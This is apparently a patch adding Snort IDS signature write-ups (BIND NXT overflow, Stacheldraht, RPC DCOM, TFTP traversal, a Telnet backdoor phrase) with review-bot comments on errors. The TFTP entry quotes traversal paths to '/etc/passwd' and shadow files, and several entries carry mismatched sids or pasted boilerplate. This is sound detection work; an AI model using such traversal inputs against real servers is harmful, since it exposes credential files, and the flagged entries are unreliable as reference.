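Review bot: Detailed Information says the rule "generates an event when a filename extension commonly used by viruses is detected" but never names the extension, which is the one thing an analyst needs to triage the alert and to weigh the False Positives note ("A legitimate attachment to an email may generate this event."); state the extension Sid 2162 matches. Typos in Impact: "An virus" should be "A virus" and "propogate" should be "propagate". There are two blank lines after the Sid where other entries use one, and Additional References has two empty lines before the closing separator.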
--- /dev/null
+++ b/doc/signatures/261.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+260
+
+--
+Summary:
+This event is generated by an attempted buffer overflow associated with incorrect validation of NXT records.
+
+--
+Impact:
+Severe. The DNS server can be compromised allowing the attacker access with the privileges of the user running BIND.  This attack is sometimes referred to as ADMROCKS because a subdirectory named ADMROCKS is placed in the directory associated with BIND software. 
+
+--
+Detailed Information:
+Improper validation of DNS NXT records may allow an attacker to perform a buffer overflow.  This can allow execution of arbitrary code with the privileges of the user running BIND.
+
+--
+Affected Systems:
+BIND versions 8.2 up to, but not including, 8.2.2.
+
+--
+Attack Scenarios:
+An attacker can launch this exploit to gain remote access to the DNS server.
+
+--
+Ease of Attack:
+Simple.  Code exists to exploit the buffer overflow.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to a version of BIND 8.2.2, or greater or patch vulnerable versions of BIND.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-1999-14.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0833
+
+Bugtraq:
+http://www.securityfocus.com/bid/788
+
+
+--
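Review bot: the Sid in this file is 260 but the file is doc/signatures/261.txt; every other file in this patch is named after its Sid, so one of the two is wrong and the entry will be either unreachable for one rule or mislabelled for the other. Check against the rule set and correct whichever is wrong. Corrective Action reads "Upgrade to a version of BIND 8.2.2, or greater or patch vulnerable versions of BIND."; the comma is misplaced, and "Upgrade to BIND 8.2.2 or later, or patch vulnerable versions." is cleaner. Additional References has two blank lines before the closing separator.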
--- /dev/null
+++ b/doc/signatures/100000764.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000764
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MyPHP CMS" application running on a webserver. Access to the file "global_header.php" using a remote file being passed as the "domain" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "domain" parameter in the "global_header.php" script used by the "MyPHP CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
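Review bot: the third Detailed Information paragraph and the Attack Scenarios paragraph describe a credential-validation weakness ("An attacker can access an authentication mechanism and supply his/her own credentials") rather than the remote file include via the "domain" parameter of global_header.php that the Summary and first paragraph describe; both appear pasted from a generic PHP-authentication template and should be replaced with the scenario the Summary already gives (a remote file location supplied in that parameter). "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing", the file starts with two blank lines, and the "--" after the Sid, after Affected Systems and after Contributors lacks the blank line used elsewhere. Additional References is empty.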
--- /dev/null
+++ b/doc/signatures/1854.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1854
+
+--
+Summary:
+This event is generated when activity indicating the presence of a
+variant of the Stacheldraht DDOS tool is detected.
+
+--
+Impact:
+Distributed Denial of Service (DDoS) is possible.
+
+--
+Detailed Information:
+Stracheldraht is a Distributed denial of service tool normally found on
+Sun Solaris machines. It is made up of a Client, handler and agent. The
+clients connects to the handler. Handlers can connect with up to 1000
+agents. Communication between the client and the handler is conducted
+using tcp and the communication between the handler and the agent can be
+either tcp or icmp_echoreply. This rule detects the message sent from
+the handler to the agent. This traffic differs from the traffic described on
+http://staff.washington.edu/dittrich/misc/stacheldraht.analysis because the
+packets have an icmp id of 9015 rather than 1000 as noted in the analysis.
+
+--
+Affected Systems:
+	Sun Solaris
+
+--
+Attack Scenarios:
+The agent can be used to mount a distributed denial of service attack. It
+also indicates that a machine is compromised.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+The icmp id along with the keywords may be changed in the
+source code which would then evade this rule.
+
+--
+Corrective Action:
+Disconnect power from the machine and perform forensic analysis on the
+hard drives.
+
+--
+Contributors:
+Snort documentation contributed by Ian Macdonald
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
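Review bot: "Stracheldraht" in the first line of Detailed Information is a typo for "Stacheldraht", which is spelled correctly in the Summary and in the washington.edu URL. Grammar: "The clients connects to the handler" should be "The client connects to the handler", and "Client, handler and agent" mixes capitalisation. Corrective Action ("Disconnect power from the machine and perform forensic analysis on the hard drives.") is inconsistent with the TFN entry earlier in this patch, which advises forensic analysis to discover the means of compromise and then rebuilding a confirmed compromised host; the two DDoS-agent entries should give the same guidance. The False Negatives note that the icmp id and keywords can be changed in the source is a useful caveat and the kind the TFN entry lacks.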
--- /dev/null
+++ b/doc/signatures/3374.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3374
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
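Review bot: this file is word-for-word identical to doc/signatures/3179.txt earlier in the patch, including the typo "Expoit code exists" and the Attack Scenarios paragraph about "a request for a file with an overly long filename via a network share", which does not match the malformed RPC request described in Detailed Information. Two Sids presumably match different traffic; Detailed Information should say what distinguishes 3374 from 3179, otherwise an analyst cannot tell why two different alerts fired. Additional References is empty in both copies.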
--- /dev/null
+++ b/doc/signatures/100000119.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+100000119
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow 
+present in Internet Explorer's urlmon.dll file.
+
+-- 
+
+Impact: 
+An attacker may execute arbitrary commands with the privileges of the user 
+running Internet Explorer.
+
+--
+Detailed Information:
+If a web server sends data with a Content-Encoding value of 300 or more bytes, 
+a buffer overflow is triggered, and commands may be executed with the 
+privileges of the user running Internet Explorer.
+
+--
+Affected Systems:
+Internet Explorer 5.0.1
+Internet Explorer 5.0.1 SP1
+Internet Explorer 5.0.1 SP2
+Internet Explorer 5.0.1 SP3
+Internet Explorer 5.5
+Internet Explorer 5.5 SP1
+Internet Explorer 5.5 SP2
+Internet Explorer 6.0
+Internet Explorer 6.0 SP1
+
+--
+
+Attack Scenarios: 
+An attacker must entice a user to click on a link to a properly configured 
+server, which will return the necessary data.
+
+-- 
+
+Ease of Attack: 
+Simple. An attacker must control a properly configured web server, and entice 
+users to click on a link to that server.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Apply the latest patches for Internet Explorer from Microsoft.com.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
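Review bot: the extra blank line inserted between several "--" separators and the following section label (before "Impact:", "Attack Scenarios:", "Ease of Attack:", "False Positives:" and "Corrective Action:") breaks the one-blank-line layout every other file in this patch uses; remove them. Detailed Information gives the trigger condition precisely ("a Content-Encoding value of 300 or more bytes"), which is good, but Additional References is empty; the Microsoft bulletin or CVE for the urlmon.dll overflow would let operators map the nine listed Internet Explorer versions to a patch. Minor: the "Rule: ", "Sid: " and "-- " lines carry trailing whitespace.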
--- /dev/null
+++ b/doc/signatures/215.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+215
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "d13hh[".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
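Review bot: the Affected Systems section is missing from this file; every other entry in the patch has one between Detailed Information and Attack Scenarios, and the first line of Detailed Information ("This Trojan affects Linux operating systems:") ends in a colon with nothing following it, so the list that belonged there appears to have been lost. Restore the section (at least "Linux" under Affected Systems) and drop the dangling colon. The Summary has a double space in "when  an attacker". The last Corrective Action step ("Delete the Trojan and kill any associated processes.") should carry the guidance given in the DDoS entries of this patch, namely forensic analysis and rebuilding a confirmed compromised host, since Ease of Attack itself states the target machine may already be compromised.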
--- /dev/null
+++ b/doc/signatures/2579.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2579
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a heap overflow
+associated with Kerberos V5.
+
+--
+Impact:
+A successful attack may cause a heap overflow, permitting the execution of
+arbitrary code.
+
+--
+Detailed Information:
+When Kerberos V5 uses a non-default configuration of enabling rules-based
+mapping, it is possible to cause a heap overflow and the subsequent
+execution of arbitrary code on the vulnerable host.  The attacker has
+to successfully authenticate in order to exploit the vulnerability.
+If an attacker supplies an overly long principal name, it may be possible
+to cause a heap overflow on the vulnerable Kerberos-enabled server.
+
+--
+Affected Systems:
+MIT Kerberos V5 including krb5-1.3.3
+
+--
+Attack Scenarios:
+An attacker authenticates to the Kerberos server and later supplies
+an overly long principle name when attempting to connect to a server
+that employs Kerberos authentication. This can cause a heap overflow
+and subsequent execution of code on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Dan Roelker <dan.roelker@sourcefire.com>
+
+--
+Additional References
+
+Other:
+http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2004-001-an_to_ln.txt
+
+--
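Review bot: "Affected Systems: MIT Kerberos V5 including krb5-1.3.3" does not say whether earlier releases are affected, and since the Corrective Action is "Upgrade to the latest non-affected version of the software", the affected range needs to be explicit (presumably all releases up to and including 1.3.3; check against the MITKRB5-SA-2004-001 advisory cited below). "Ease of Attack: Simple." sits oddly with the Detailed Information's own statements that "The attacker has to successfully authenticate in order to exploit the vulnerability" and that rules-based mapping is a non-default configuration; say "Simple, but requires valid Kerberos credentials and a server configured for rules-based aname-to-lname mapping". Because the configuration is non-default, the Corrective Action can also list the obvious workaround of disabling rules-based mapping until the upgrade is done. Typo in Attack Scenarios: "principle name" should be "principal name".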
--- /dev/null
+++ b/doc/signatures/3095.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3095
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
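Review bot: the Additional References section is empty, so "Apply the appropriate vendor supplied patches." gives the reader nothing to look up; cite the Microsoft security bulletin for the License Logging Service overflow so the patch can be identified. The Detailed Information is also word-for-word the same as 3123.txt later in this patch; if the two sids differ only in transport or port (for example NetBIOS session versus direct-hosted SMB), say so here, otherwise one of the two rules is redundant. Minor: "Microsoft Windows Server 2000" is not a product name and should read "Microsoft Windows 2000 Server".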
--- /dev/null
+++ b/doc/signatures/100000538.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000538
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "thinkWMS" application running on a webserver. Access to 
+the file "index.php" with SQL commands being passed as the "catid" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "catid" parameter in the "index.php" script used by the 
+"thinkWMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using thinkWMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
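Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host...") is generic CGI authentication boilerplate with no bearing on SQL injection through "catid", and it carries the typo "ona"; drop it. "False Positives: None known." is unlikely for a rule that, per the Summary, keys on "SQL commands being passed as the catid parameter": a legitimate category value or free text containing a word such as SELECT or UNION would match, so state what the rule actually looks for and list that as a false positive. The Corrective Action should add the application-level fix, validating catid as an integer and using parameterized queries, since the Attack Scenarios paragraph already names unsanitized input as the root cause; and Additional References should cite the thinkWMS advisory itself rather than only a general SQL injection article.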
--- /dev/null
+++ b/doc/signatures/426.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+426
+
+--
+
+Summary:
+This event is generated when a router generates and ICMP Parameter Problem Required Option Missing datagram.
+
+--
+
+Impact:
+This could be an indication of a protocol error by a previous hop router.  Normally this datagram would only be generated when the IP datagram is truncated or damaged before it reaches its final destination.
+
+--
+
+Detailed Information:
+A router generates a Parameter Problem message for any error not specifically covered by another ICMP message.  An ICMP Parameter Problem Required Option Missing datagram indicates that the IP datagram is invalid or contains invalid IP options.  This could be an indication of routing problems on the network, or malfunctioning routing hardware.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 12 Code 1 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for configuration errors or nefarious activity.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
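Review bot: the Impact statement ("Normally this datagram would only be generated when the IP datagram is truncated or damaged before it reaches its final destination.") describes ICMP Parameter Problem in general, not Code 1; the Detailed Information correctly ties Code 1 to a missing or invalid IP option, so align the Impact text with it. The Corrective Action ("Hosts generating these types of datagrams should be investigated") should also warn that the source address of a crafted ICMP message is easily forged, which follows from the Ease of Attack note that "Numerous tools and scripts can generate this type of ICMP datagram."; the originating host named in the alert is not necessarily the one to investigate. Typo in the Summary: "generates and ICMP" should be "generates an ICMP".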
--- /dev/null
+++ b/doc/signatures/519.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+519
+
+--
+Summary:
+This event is generated when a TFTP request is made with a parent directory designation of "..".  This may be an indication of an attempt to request or place files on the TFTP server outside the root directory configured for the TFTP server.
+
+--
+Impact:
+TFTP servers that allow files to be placed outside the configured root directory for the server may allow remote attackers to execute arbitrary commands on the system.  Additionally if the TFTP server allows directory transversal using the ".." designator it may be possible to retrieve files from other directories on the system.
+
+--
+Detailed Information:
+This rule searches for ".." payload in TFTP requests.  Vulnerable TFTP servers may allow remote attackers to transfer files to directories outside the normal root directory configured for the TFTP server.  This could result in sensitive files being transfered off the system or arbitrary files being upload to the system.
+
+--
+Attack Scenarios:
+Using the ".." designator it may be possible to fool vulnerable TFTP server into placing files or retrieving files from outside the TFTP configured root directory.  Normally an attacker will attempt to retrieve sensitive system files such as "../../etc/passwd" or "../../shadow" after determining if this attack vector is successful.  
+
+--
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large subnets for improperly configured TFTP servers.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives
+None Known
+
+--
+Corrective Action:
+Upgrade to the current version of your TFTP server solutation, or contact the product vendor for patch information.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+--
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0183
+
+Arachnids:
+http://www.whitehats.com/info/IDS137
+
+--
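Review bot: the Impact claim that a traversable TFTP server "may allow remote attackers to execute arbitrary commands on the system" is not supported by the rest of the text, which only describes reading and writing files outside the configured root; either explain how a file write leads to command execution (for example overwriting a file that is later executed) or reduce the claim to arbitrary file read and write. The Attack Scenarios example "../../shadow" should be "../../etc/shadow" to match the preceding "../../etc/passwd". Since the Detailed Information says the rule simply "searches for ".." payload in TFTP requests", a benign filename containing ".." also triggers it, so "False Positives: None Known" should say that. The Corrective Action could add the two standard mitigations alongside upgrading: run the daemon confined to its root directory (chroot or the server's secure mode) and restrict udp/69 to the hosts that legitimately boot from it. Typos: "transversal", "transfered", "upload to" and "solutation".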
--- /dev/null
+++ b/doc/signatures/2976.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+533
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
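Review bot: the Sid field says 533 but the file is 2976.txt (2972.txt earlier in this patch has the same mismatch with 536); the doc should carry the sid it is filed under, or note that 2976 is the re-issued rule. "False Positives: None Known" contradicts the Detailed Information, which says "Anybody with administrative rights can remotely access the share.": routine administrator access to C$ produces exactly this event and should be listed. The Corrective Action names only "tcp port 139", but administrative shares are reached over direct-hosted SMB on tcp port 445 as well, so blocking 139 alone from external networks leaves the share reachable; list both ports.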
--- /dev/null
+++ b/doc/signatures/100000831.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000831
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "data[to]" parameter in the "compose.email.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
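Review bot: the Impact and Detailed Information overstate what a cross site scripting bug does: "Possible execution of arbitrary code of the attackers choosing" and "execute system binaries or malicious code" describe server-side compromise, while the Attack Scenarios correctly says the attacker supplies "a malicious link designed to steal information from a user clicking on that link", that is, script running in the victim's browser. Rewrite Impact as session or credential theft and actions performed as the victim user within HiveMail, and drop the system-binaries sentence. The Corrective Action should add output encoding of the "data[to]" value in compose.email.php, which is the fix for this class of bug, and Additional References should cite the HiveMail advisory rather than only the XSS FAQ.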
--- /dev/null
+++ b/doc/signatures/1487.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1487
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) Version 4 supplies a feature to allow users to make remote password changes.  The iisadmpwd directory has several .HTR files that are used to implement the password changes.  An attacker can request a change and use a returned form to supply an account name, existing password, and new password either to brute force changes or discover whether a specific account name exist. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the IISADMPWD virtual directory to disable remote password changes.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0407
+
+Bugtraq
+http://www.securityfocus.com/bid/2110
+
+--
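Review bot: "False Positives: None Known." is wrong for this rule: the Detailed Information says IIS 4 "supplies a feature to allow users to make remote password changes", so any site that actually uses the iisadmpwd feature generates this event on every legitimate password change; list that. Two smaller points: "discover whether a specific account name exist" should be "exists", and the reference labelled CVE uses the old candidate name CAN-1999-0407; use the current identifier form. The Corrective Action could also mention unmapping the .htr extension in the IIS script mappings, which is the mechanism behind "disable HTR functionality".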
--- /dev/null
+++ b/doc/signatures/3123.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3123
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
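Review bot: this description is identical to 3095.txt earlier in this patch, down to the empty Additional References section, so a reader cannot tell what sid 3123 detects that 3095 does not. State the difference between the two rules (which message, port or transport each matches) in Detailed Information, and cite the Microsoft security bulletin for the License Logging Service overflow so that "Apply the appropriate vendor supplied patches." is actionable. "Microsoft Windows Server 2000" should read "Microsoft Windows 2000 Server".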
--- /dev/null
+++ b/doc/signatures/2801.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2801
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure resume_master_activity
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
